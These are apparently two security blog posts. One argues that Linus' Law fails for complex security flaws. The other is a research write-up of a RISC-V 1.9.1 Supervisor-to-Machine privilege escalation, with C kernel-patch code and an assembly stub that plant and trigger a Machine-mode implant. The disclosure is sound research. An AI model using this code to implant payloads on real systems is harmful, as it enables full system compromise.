In the past week, a research team from Princeton's school of engineering released details on flaws they uncovered in the RISC-V memory consistency model (MCM). This is exciting work from Professor Margaret Martonosi and her team, because it demonstrates the value of using automation to uncover design flaws in complex systems.
This strategy may be similar to the techniques used by commercial tools, such as Tortuga Logic's silicon security analysis utilities. Regardless, advances in capability from both commercial and academic teams has exponentially improved the state of the art over recent years. As a result, these bugs are being uncovered faster, and earlier in the engineering (or ratification) process, than ever before.
Codasip and Linus' Law
To comment on the Martonosi's findings, the Codasip team released a blog post describing their thoughts in the context of long-term RISC-V reliability and security. While I typically agree with the Codasip team, and have a large amount of respect for their engineering staff, I thought it imperative to comment on one aspect of their article: complex security landscapes are not made shallow when more eyes are focused on them.
This concept, colloquially known as Linus' Law, posits that all flaws in complex (and open) systems are increasingly easy to observe, detect, and resolve as the number of users and engineers of that system increases. While this model does work for quality assurance (stability) purposes, it does not work well for subtleties that impact the security of complex systems.
While there are many reasons why this mantra fails with respect to security models, I'll focus on one example for the purposes of this blog post: Linus' Law largely implies that bugs will reveal themselves.
Security is Not Stability
Linus' Law presumes one of two things will occur to diminish the total number of bugs in a complex system:
Many engineers hunt for flaws in source code
A subset of N users out of T total users will observe and report any given bug
While there are hundreds of engineers working on the Linux code base, they are often constrained within the technology they are focused on improving or implementing. Though these engineers can identify problems within their own ecosystem, they are largely focused on the source code of their implementation, not the resultant object code or machine code generated to run their source code, or the effects their code will have (and vice-versa) on multiple aspects of a running system. This level of visbility into a complex architecture is extremely challenging to acquire, and even more challenging to maintain. This is why, while many engineers submit patches to the Linux kernel, only a handful of engineers are authorized to actually approve code for inclusion into each branch of the kernel. Put simply, only a few individuals are capable of observing complex security flaws, and these individuals are largely bogged down by engineering tasks that do not include the overarching analysis of subtle behaviors in the context of security.
Yet, this point describes bugs that can be found easily prior to inclusion into the release of a kernel version. But, what happens when a bug does get through these checks and balances and ends up in the wild? This is where the many users part of Linus' Law comes into play. Someone, somewhere, out in production, will observe anomalous behavior. Hopefully, this user (or users) will also report this issue to the kernel team, or their distribution maintainers. It's fine to presume this will occur, but this will likely only occur if the bug is actually triggered by the user.
In the case of complex security flaws, they are almost never triggered in the wild on accident. Exploiting a complex security flaw usually only occurs with intent, not arbitrarily. If one piece of a complex set of bugs leading to a critical gap in system security is triggered accidentally, it may never be observed as a flaw impacting security unless a specific chain of flaws are triggered all at once, and in a particular order. This is highly improbable in the real world, and results in a lot of simple bugs either being ignored as irrelevant, or resolved in the context of stability and not flagged as security related, which affects who applies the patch and how quickly.
This is why applications like Ubuntu's whoopsieare imperative, to ensure that even the simplest bugs are not ignored. But, it also requires the team reviewing whoopsie bug/crash reports to be capable of evaluating the risk of each flaw, then properly escalating the issue to someone with authority. So, there are still gaps even with this practice in place.
Thus, as we can see, Linus' Law works well to ensure the stability of complex systems, but it is very inefficient at identifying and guarding users against security flaws.
That Lonesome Road
The real resolution to complex security related issues is creating a team to perform a unified analysis of each technology used in a system, and the overarching interactions between the technologies that make up the whole system. Using this model, less long-term flaws can make their way into system releases, and the ones that do are more likely to be simple bugs that can be detected using the presumptions in Linus' Law.
In addition, tools like Professor Martonosi's team's technology, and commercial tools like Tortuga Logic's silicon security utilities, can greatly assist an internal security team, streamlining their workload and reducing errors by optimizing their time.
This path, however, requires a long-term commitment to security, and an understanding that security is not a separate discipline from engineering, but is an effect of engineering stable systems. This is because a stable system is one that enforces rigid constraints around how data is accessed, stored, and processed. Insecure systems create arbitrary paths around these constraints, reducing the integrity of a system. Thus, any system with reduced integrity cannot be considered a stable system.
Though it comes at a cost, the positive effects of implementing a security program are long lasting for both manufacturers and consumers, ensuring greater stability and system integrity for not only end-users, but for the global Internet.
For more information on architectural security analysis, please reach out to Lab Mouse Security. We specialize in architectural security for embedded systems, from wearable IoT, to Industrial IoT, and more!
The following video demonstrates my original proof-of-concept exploit for the RISC-V privilege escalation logic flaw in the 1.9.1 version of the standard. The exploit lives in a patched Linux kernel, controlled through a simple userland application. The Linux kernel triggers the exploit and breaks out of Supervisor privilege in order to abuse the Machine level privilege. You may need to play the video in full-screen mode to view the console text.
In the video, the userland application fakesyscall is used to control the exploit living in the Linux kernel. The first option passed to the app (and subsequently to the kernel) is 6. Option 6 simply tells the kernel to dump bytes of memory at a specific address in RAM. Option 8 then overwrites this same memory region with illegal opcodes. Option 6 is used again to verify that the opcodes have been overwritten.
Finally, option 9 is used to tell the malicious kernel to trigger a call from its privilege layer (Supervisor) to Machine mode, which executes the overwritten instructions. This causes an unhandled exception in QEMU, which is displayed at the bottom of the screen at the end of the video ("unhandlable trap 2"). Trap 2 represents the illegal instruction trap, which is not supported in the Machine layer of this implementation (riscv64-system-qemu and riscv-pk).
A Brief Introduction to RISC-V Privilege
The RISC-V privilege model was initially designed as an ecosystem that consists of four separate layers of privilege: User, Supervisor, Hypervisor, and Machine. The User privilege layer is, of course, the least privileged layer, where common applications are executed. Supervisor is the privilege layer where the operating system kernel (such as Linux, mach, or Amoeba) lives. The Hypervisor layer was intended to be the layer at which control subsystems for virtualization would live, but has been deprecated in more recent versions of the privilege specification. The Machine layer is the highest privileged layer in RISC-V, and has access to all resources in the system at all times.
Full compromise of a system with a RISC-V core can't simply mean compromise of both the User and System privilege layers, which is the goal of most modern attacks. Rather, breaking out of the System layer into the Machine layer is required. This is because of the capability that the Machine layer will have in the future.
The Hypervisor layer (H-Mode) is currently removed from the 1.10 privilege specification. The intent is that it may be re-added in a future revision of the privilege specification. Alternatively, it could be conglomerated with the Machine layer. Regardless, both layers are designed to control processor functionality that the Supervisor layer cannot access. This includes physical memory regions assigned to other hypervisor guests, restricted peripherals, Hypervisor and Machine registers, and other high-privileged objects.
In the future, Machine mode may also be used as a subsystem similar to TrustZone or Intel SMM. Trusted keys may be used here to validate executable code running in the Hypervisor or Supervisor layer. It may also support Supervisor's verification of User layer applications. Other critical security goals can be achieved by leveraging the isolation and omnipotence of the Machine layer. Such functionality may be able to detect and disable a Supervisor layer exploit. Thus, escalating privileges from Supervisor layer to Machine layer as quickly as possible is imperative for future-proofing RISC-V exploits.
Resolving the Risk
Before we get into the technical details, it is important to note that the RISC-V team is aware of this privilege escalation problem. I presumed this when I discovered this vulnerability, as anyone with a background in operating system theory or CPU memory models will quickly observe the gap in security caused by the 1.9.1 privilege specification's memory definition. More on that later.
Regardless, I was unable to find material supporting that the team knew of this security gap and, in my excitement, did not realize that a resolution to this issue was proposed 15 days prior to my HITB talk. Stefan O'Rear emailed me privately and pointed out the git commit for the proposal, which explained why I was unable to find it (I was using poor search terms in my haste).
The proposal (for PMP: Physical Memory Protection) can be found here on github. In his email to me, Stefan points out that the image QEMU (and Bellard's riscvemu) executes, which contains the bootloader and the embedded Linux kernel/rootfs images, isn't designed for full Machine layer protection, and that it may not be updated with the PMP model in the near future.
This is a reasonable perspective, but, academically, the exploit is still an important demonstration of flaws in CPU security logic. The target, itself, doesn't have to be an attempt at a perfectly secure system. It is more important that the exploit be proven practical and useful as an exercise.
Besides, this was the first CPU level security implementation flaw I've ever discovered on my own accord. So, I had extra incentive to actually exploit it. ;-)
But PMP Existed!
Correct! For those familiar, there was a PMP definition in the v1.9.1 privilege specification of RISC-V. However, this implementation was considered incomplete and not capable of deployment. This is probably why the qemu-system-riscv* emulators don't support it currently. As the git commit declares, the PMP full proposal scheme was only introduced a couple weeks prior to this post.
The Vulnerability
The technical vulnerability is actually quite simple, especially if the reader is familiar with common CPU models for memory protection. Each privilege layer is presumed to be isolated from all lower privileged layers during code execution, as one would expect. The CPU itself ensures that registers attributed to a specific privilege layer cannot be accessed from a less privileged layer. Thus, as a policy, Supervisor layer code can never access Machine layer registers. This segmentation helps guarantee that the state of each layer cannot be altered by lower privileged layers.
However, the original privilege specification defined memory protection in two separate places. First, the mstatus register's VM field defines what memory protection model shall be used during code execution. This can be found in section 3.1.8 of privilege specification v1.9.1. Table 3.3 in that same section outlines the various memory protection/translation schemes currently defined by the RISC-V team.
The second place where memory protection is defined isn't in the Machine layer at all, it's in the Supervisor layer. This is where things get tricky. Because the Supervisor layer is where a traditional Operating System kernel would execute, it must be able to alter page tables to support dynamic execution of kernel code and userland applications. Thus, the sptbr (Supervisor Page-Table Base Register), found in section 4.1.10, allows the Supervisor layer to control read and write access to the page tables.
For those that are unfamiliar, page tables control translation of virtual memory addresses (va) to physical memory addresses (pa). Page tables also enforce access privileges for each page, e.g. whether the page is Read-Only, Write-Only, Executable, etc.
Because the Machine layer of privilege's executable code resides in physical memory, and the Supervisor layer can create page tables that can access that physical memory, the Machine layer cannot protect itself from the Supervisor layer.
The attack works this way:
A malicious Supervisor kernel determines the physical address of Machine layer code
The kernel creates a page table entry that grants itself read/write access to the Machine layer
The kernel overwrites Machine layer code with a beneficial implant
The kernel triggers a trap to Machine mode, causing the implant to be executed with Machine privileges
It's quite simple!
The Exploit
The fun part about this vulnerability was not so much discovering it, but writing a useful exploit rather than simply a proof-of-concept that demonstrated code execution. At HITB2017AMS this past week, I used a simple PoC to show that implanted code was indeed executing in Machine mode. However, this is quite boring and has no real value beyond proving the vulnerability.
A real exploit needs to allow code injection in a way that any arbitrary payload can be implanted and executed within the Machine context, from Supervisor context. To accomplish this, it was necessary to do the following:
Identify Machine layer code that the Supervisor can trigger at will
Identify an unused or little-used function in that code that can be altered without negative consequence
Ensure arbitrary payloads can be stored within this region
Triggering Machine Layer Code
This is the simplest part of the process. Currently, booting a RISC-V system means using the Proxy Kernel (riscv-pk) as a bootloader. This code lives in the Machine layer and loads an embedded kernel (such as Linux or FreeBSD) into virtual memory.
The riscv-pk must support the embedded kernel by providing resources, such as access to the console device, information about the RISC-V CPU core the kernel is running on, and other duties usually handled by mask ROM or flash. riscv-pk does this through the ecall instruction, the common instruction used to call the next most privileged layer in the processor. For example, an ecall executed at the User layer will likely be handled at the Supervisor layer. An ecall executed at the Supervisor layer will be handled by the Machine layer. (This is a simplistic explanation that can get more complex with trap redirection, but we won't dive into those waters at this moment).
So, when the Supervisor (Linux kernel) executes ecall, the Machine layer's trap handler is executed in Machine mode. The code can be found in the riscv-pk at trap 9, the mcall_trap function, in machine/mtrap.c.
Unused Functionality
Most of the functionality in mcall_trap must be preserved, to ensure the stability of the system. Overwriting arbitrary instructions here is frowned upon from an exploit developer perspective. Instead, we must target specific functionality to disturb as little of the ecosystem as possible. Fortunately, we can do so with the MCALL_SHUTDOWN feature.
This feature does precisely what it sounds like, it performs an immediate system shut down as if someone hit an ACPI power-off button on a PC. Presumably, we would never do this in a system we've compromised. We want the system live so we can control it! Thus, this is the feature to overwrite. However, only a few instructions can be overwritten here as the functionality is small. Take a look at the assembly generated by this feature:
This only gives us 6 instructions to overwrite. Not much capability can be performed here! So, instead, we simply call another region of memory that can't be directly accessed by forcing a trap to mcall_trap.
We can be a bit clever and overwrite the code that bootstraps the Proxy Kernel, do_reset. This function has zero value for an already running environment! So, why not reclaim the executable space? When reading the objdump of the current riscv-pk, we can see that 60 32bit instructions (or 120 16bit compressed instructions) can be stored here. If we simply jump to the do_reset address and perform our real work here, we can get away with quite a bit, especially if we can constantly update this region of memory with any payload we choose.
Arbitrary Payloads
Storing arbitrary payloads in this region simply means designing a sufficiently engineered implant stager in our patched malicious Linux (or other) kernel. This feature simply loads the physical memory addresses at which an implant should live, and installs the implant. Easy! There's not much to it. The only catch is ensuring our jump instructions know the address of the target physical memory address (and can reach the address using a single instruction).
Linux Kernel Patch
The change to the Linux kernel is simple. We simply alter a system call to perform the implant installation and mtrap trigger. This can be done by augmenting any system call with two chunks of code:
/* install implant at physical address a2 */
else if(regs->a1 == 8)
{
uint8_t * c;
int i;
/* Overwrite an address a2 of maximum size 4096 with
* binary code pointed to by a4 of size a3.
*/
printk(
"DONB: overwriting %p:%lx\n",
(const void * )regs->a2,
regs->a3);
x = ioremap(regs->a2, 4096);
printk("DONB: remapped to %p\n", x);
r = -1;
if(!access_ok(VERIFY_READ, regs->a4, regs->a3))
{
printk("DONB: bad access_ok\n");
goto __bad_copy;
}
printk("DONB: access ok\n");
if(regs->a3 <= 0 || regs->a3 > 4096)
{
printk("DONB: bad a3\n");
goto __bad_copy;
}
printk("DONB: a3 ok\n");
if(__copy_from_user(
x,
(const void * )regs->a4,
regs->a3))
{
printk("DONB: bad copy from user\n");
goto __bad_copy;
}
printk("DONB: copy ok\n");
iounmap(x);
/* update the tlb */
__asm__("fence; fence.i");
The above code installs an implant at the given physical address in system call argument 2. Argument 4 contains a pointer to a userland buffer containing the binary to be written at the mapped virtual address. Argument 3 contains the size of the binary blob to be written. The last function ensures that the TLB is updated since we are altering instruction code, which guarantees that the CPU has the updated copy of our executable code and wont execute an out of date cache, once triggered.
/* trigger implant overwritten at MCALL_SHUTDOWN */ else if(regs->a1 == 9) { printk("DONB(8): ok, now try the m-hook\n"); /* MCALL_SHUTDOWN=6 */ __asm__("li a7, 6; ecall; mv %0, a0" : "=r" (r)); printk("DONB(8): returned = %d\n", r); }
This code issues an ecall, causing mcall_trap to be executed from Machine mode context. This, in other words, executes our implant at a higher privilege level. .global callreset callreset: auipc t0, 0 addi t0, t0, -1578 addi t0, t0, -1578 jalr t0
Finally, the above code, written to the MCALL_SHUTDOWN feature in the mcall_trap function, calls our implant at do_reset. The code in my version of riscv-pk expects do_reset at address 0x800001a8 and the overwritten MCALL_SHUTDOWN code at 0x80000dfc. The differential between these two addresses requires two addi instructions to generate the proper negative offset. This can probably be done in a cleaner manner.
The only requirement left is for the implant at do_reset to restore the stack and return, to avoid crashing by not properly adjusting the Machine mode memory layout. This can be accomplished by returning to the mcall_trap function at an address where it is performing this functionality. In my implementation, there is only one address where this occurs, 0x80000ccc.
Gimme Code
For working demonstration code, please visit my github archive where I will track all of my RISC-V related security research.